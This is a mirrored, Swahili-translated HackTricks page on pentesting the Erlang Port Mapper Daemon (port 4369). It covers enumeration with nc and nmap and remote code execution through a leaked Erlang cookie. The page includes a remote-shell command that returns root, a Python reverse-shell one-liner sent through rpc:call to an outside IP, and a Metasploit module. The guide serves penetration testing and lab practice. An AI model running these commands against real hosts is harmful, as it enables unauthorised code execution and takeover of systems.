maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md

86 lines
3.2 KiB
Markdown
Raw Blame History

{{#include ../banners/hacktricks-training.md}}
# Basic Info
**Erlang Port Mapper Daemon (epmd)** inafanya kazi kama mratibu wa mifano ya Erlang iliyosambazwa. Inawajibika kwa kubadilisha majina ya nodi ya alama kuwa anwani za mashine, kwa msingi kuhakikisha kwamba kila jina la nodi linahusishwa na anwani maalum. Jukumu hili la **epmd** ni muhimu kwa mwingiliano na mawasiliano yasiyo na mshono kati ya nodi tofauti za Erlang katika mtandao.
**Default port**: 4369
```
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
```
Hii inatumika kama chaguo la msingi kwenye usakinishaji wa RabbitMQ na CouchDB.
# Uhesabu
## Mikono
```bash
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
apt-get install erlang
erl #Once Erlang is installed this will promp an erlang terminal
1> net_adm:names('<HOST>'). #This will return the listen addresses
```
## Otomatiki
```bash
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
PORT STATE SERVICE VERSION
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
| bigcouch: 11502
| freeswitch: 8031
| ecallmgr: 11501
| kazoo_apps: 11500
|_ kazoo-rabbitmq: 25672
```
# Erlang Cookie RCE
## Remote Connection
Ikiwa unaweza **kutoa siri ya uthibitishaji** utaweza kutekeleza msimbo kwenye mwenyeji. Kawaida, siri hii iko katika `~/.erlang.cookie` na inatengenezwa na erlang wakati wa kuanza kwa mara ya kwanza. Ikiwa haijabadilishwa au kuwekwa kwa mikono ni mfuatano wa nasibu \[A:Z] wenye urefu wa herufi 20.
```bash
greif@baldr ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh test@target.fqdn
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
Eshell V8.1 (abort with ^G)
At last, we can start an erlang shell on the remote system.
(test@target.fqdn)1>os:cmd("id").
"uid=0(root) gid=0(root) groups=0(root)\n"
```
Zaidi ya habari katika [https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/](https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/)\
Mwandishi pia anashiriki programu ya kubruteforce cookie:
{{#file}}
epmd_bf-0.1.tar.bz2
{{#endfile}}
## Muunganisho wa Mitaa
Katika kesi hii tutatumia CouchDB kuboresha mamlaka kwa ndani:
```bash
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
(anonymous@canape)1> rpc:call('couchdb@localhost', os, cmd, [whoami]).
"homer\n"
(anonymous@canape)4> rpc:call('couchdb@localhost', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
```
Mfano umechukuliwa kutoka [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)\
Unaweza kutumia **Canape HTB machine** **kufanya mazoezi** jinsi ya **kutumia hii vuln**.
## Metasploit
```bash
#Metasploit can also exploit this if you know the cookie
msf5> use exploit/multi/misc/erlang_cookie_rce
```
# Shodan
- `port:4369 "katika bandari"`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink